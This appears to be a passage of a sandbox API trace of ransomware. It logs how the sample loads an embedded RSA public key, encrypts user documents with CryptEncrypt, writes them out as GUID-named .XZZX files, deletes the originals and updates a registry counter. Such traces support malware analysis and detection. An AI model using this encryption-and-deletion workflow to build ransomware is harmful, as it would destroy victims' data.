GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0041.806] CryptEncrypt (in: hKey=0x42e55d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0041.806] CryptEncrypt (in: hKey=0x42e55d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2ec98*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2ec98*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0041.806] WriteFile (in: hFile=0x4b0, lpBuffer=0x3e2ec98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e2ec98*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0041.806] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0041.806] WriteFile (in: hFile=0x4b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0041.806] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0041.807] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0041.807] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x4cc) returned 0x0 [0041.807] RegQueryValueExW (in: hKey=0x4cc, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x2b, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0041.807] RegCloseKey (hKey=0x4cc) returned 0x0 [0041.807] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x4cc) returned 0x0 [0041.807] RegSetValueExW (in: hKey=0x4cc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x2c, cbData=0x4 | out: lpData=0x42cdfec*=0x2c) returned 0x0 [0041.807] RegCloseKey (hKey=0x4cc) returned 0x0 [0041.807] VirtualFree (lpAddress=0x3ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.807] VirtualFree (lpAddress=0x3f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.808] CloseHandle (hObject=0x4b0) returned 1 [0041.809] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0041.810] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0041.810] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\Kv3rt4CpuhTFQ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\kv3rt4cpuhtfq.pptx")) returned 1 [0041.852] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\Kv3rt4CpuhTFQ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\kv3rt4cpuhtfq.pptx")) returned 0 Thread: id = 138 os_tid = 0x95c [0041.739] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0041.739] lstrcpyW (in: lpString1=0x417f460, lpString2="WHrA_.docx" | out: lpString1="WHrA_.docx") returned="WHrA_.docx" [0041.739] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0041.739] SetErrorMode (uMode=0x1) returned 0x1 [0041.739] lstrcpyW (in: lpString1=0x417f860, lpString2="WHrA_.docx" | out: lpString1="WHrA_.docx") returned="WHrA_.docx" [0041.739] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x94fd01f0, Data2=0x4ed6, Data3=0x450a, Data4=([0]=0xaf, [1]=0x9, [2]=0x24, [3]=0xf5, [4]=0x5f, [5]=0x9f, [6]=0x46, [7]=0x61))) returned 0x0 [0041.739] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\WHrA_.docx") returned 91 [0041.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0041.739] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\A216BEA01542C25C94FD01F0195AA6A4.XZZX") returned 118 [0041.739] StrStrW (lpFirst="WHrA_.docx", lpSrch="XZZX") returned 0x0 [0041.739] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\WHrA_.docx", dwFileAttributes=0x20) returned 1 [0041.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\WHrA_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\whra_.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0041.740] ReadFile (in: hFile=0x4b0, lpBuffer=0x42d3050, nNumberOfBytesToRead=0x1119, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42d3050*, lpNumberOfBytesRead=0x417e418*=0x1119, lpOverlapped=0x0) returned 1 [0041.740] CloseHandle (hObject=0x4b0) returned 1 [0041.740] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0041.741] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0041.741] SetErrorMode (uMode=0x1) returned 0x1 [0041.741] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0041.741] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2eb88) returned 1 [0041.744] CryptGenKey (in: hProv=0x3e2eb88, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5650) returned 1 [0042.025] CryptExportKey (in: hKey=0x42e5650, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0042.025] CryptExportKey (in: hKey=0x42e5650, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0042.025] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0042.025] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0042.025] CryptDestroyKey (hKey=0x42e5650) returned 1 [0042.025] CryptReleaseContext (hProv=0x42d4190, dwFlags=0x0) returned 0 [0042.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\A216BEA01542C25C94FD01F0195AA6A4.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\a216bea01542c25c94fd01f0195aa6a4.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4bc [0042.026] WriteFile (in: hFile=0x4bc, lpBuffer=0x42d3050*, nNumberOfBytesToWrite=0x1119, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d3050*, lpNumberOfBytesWritten=0x417e438*=0x1119, lpOverlapped=0x0) returned 1 [0042.026] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1119 [0042.026] WriteFile (in: hFile=0x4bc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0042.026] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x111e [0042.026] WriteFile (in: hFile=0x4bc, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x14, lpOverlapped=0x0) returned 1 [0042.027] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1132 [0042.027] WriteFile (in: hFile=0x4bc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0042.027] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1137 [0042.027] SetErrorMode (uMode=0x1) returned 0x1 [0042.027] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0042.027] OutputDebugStringW (lpOutputString="end") [0042.027] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wh\x9eâ\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0042.027] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0042.027] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d4218) returned 1 [0042.028] CryptImportPublicKeyInfo (in: hCryptProv=0x42d4218, dwCertEncodingType=0x1, pInfo=0x3e3f2f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3f320*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3f328*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5650) returned 1 [0042.028] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0042.028] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0042.028] CryptEncrypt (in: hKey=0x42e5650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0042.028] CryptEncrypt (in: hKey=0x42e5650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d42a0*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d42a0*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0042.028] WriteFile (in: hFile=0x4bc, lpBuffer=0x42d42a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d42a0*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0042.028] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0042.028] WriteFile (in: hFile=0x4bc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0042.028] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0042.029] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0042.029] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x4d0) returned 0x0 [0042.029] RegQueryValueExW (in: hKey=0x4d0, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x2c, lpcbData=0x417dfdc*=0x4) returned 0x0 [0042.029] RegCloseKey (hKey=0x4d0) returned 0x0 [0042.029] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x4d0) returned 0x0 [0042.029] RegSetValueExW (in: hKey=0x4d0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x2d, cbData=0x4 | out: lpData=0x417dfec*=0x2d) returned 0x0 [0042.029] RegCloseKey (hKey=0x4d0) returned 0x0 [0042.029] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.029] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0042.030] CloseHandle (hObject=0x4bc) returned 1 [0042.030] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0042.031] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0042.031] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\WHrA_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\whra_.docx")) returned 1 [0042.032] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\WHrA_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\whra_.docx")) returned 0 Thread: id = 139 os_tid = 0x968 [0041.898] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0041.898] lstrcpyW (in: lpString1=0x42cf460, lpString2="YtaJJRAGe.rtf" | out: lpString1="YtaJJRAGe.rtf") returned="YtaJJRAGe.rtf" [0041.898] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0041.898] SetErrorMode (uMode=0x1) returned 0x1 [0041.898] lstrcpyW (in: lpString1=0x42cf860, lpString2="YtaJJRAGe.rtf" | out: lpString1="YtaJJRAGe.rtf") returned="YtaJJRAGe.rtf" [0041.898] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0xdfc379d7, Data2=0x1e87, Data3=0x46b2, Data4=([0]=0xae, [1]=0x58, [2]=0x83, [3]=0x9a, [4]=0xdb, [5]=0x1f, [6]=0xdc, [7]=0xb0))) returned 0x0 [0041.898] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\YtaJJRAGe.rtf") returned 94 [0041.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0041.898] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\E85C7261086E23DEDFC379D70C9B0826.XZZX") returned 118 [0041.898] StrStrW (lpFirst="YtaJJRAGe.rtf", lpSrch="XZZX") returned 0x0 [0041.898] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\YtaJJRAGe.rtf", dwFileAttributes=0x20) returned 1 [0041.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\YtaJJRAGe.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\ytajjrage.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4bc [0041.899] ReadFile (in: hFile=0x4bc, lpBuffer=0x42e5eb8, nNumberOfBytesToRead=0xef31, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesRead=0x42ce418*=0xef31, lpOverlapped=0x0) returned 1 [0041.900] CloseHandle (hObject=0x4bc) returned 1 [0041.900] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3ef0000 [0041.900] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3f00000 [0041.900] SetErrorMode (uMode=0x1) returned 0x1 [0041.901] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0041.901] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d4190) returned 1 [0041.903] CryptGenKey (in: hProv=0x42d4190, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e56d0) returned 1 [0042.045] CryptExportKey (in: hKey=0x42e56d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0042.045] CryptExportKey (in: hKey=0x42e56d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3f00000, pdwDataLen=0x42ce41c | out: pbData=0x3f00000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0042.045] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0042.046] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0042.046] CryptDestroyKey (hKey=0x42e56d0) returned 1 [0042.046] CryptReleaseContext (hProv=0x42d4190, dwFlags=0x0) returned 0 [0042.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\E85C7261086E23DEDFC379D70C9B0826.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\e85c7261086e23dedfc379d70c9b0826.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c8 [0042.046] WriteFile (in: hFile=0x4c8, lpBuffer=0x42e5eb8*, nNumberOfBytesToWrite=0xef31, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesWritten=0x42ce438*=0xef31, lpOverlapped=0x0) returned 1 [0042.047] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xef31 [0042.047] WriteFile (in: hFile=0x4c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0042.047] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xef36 [0042.047] WriteFile (in: hFile=0x4c8, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x1a, lpOverlapped=0x0) returned 1 [0042.047] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xef50 [0042.047] WriteFile (in: hFile=0x4c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0042.047] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xef55 [0042.047] SetErrorMode (uMode=0x1) returned 0x1 [0042.047] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0042.047] 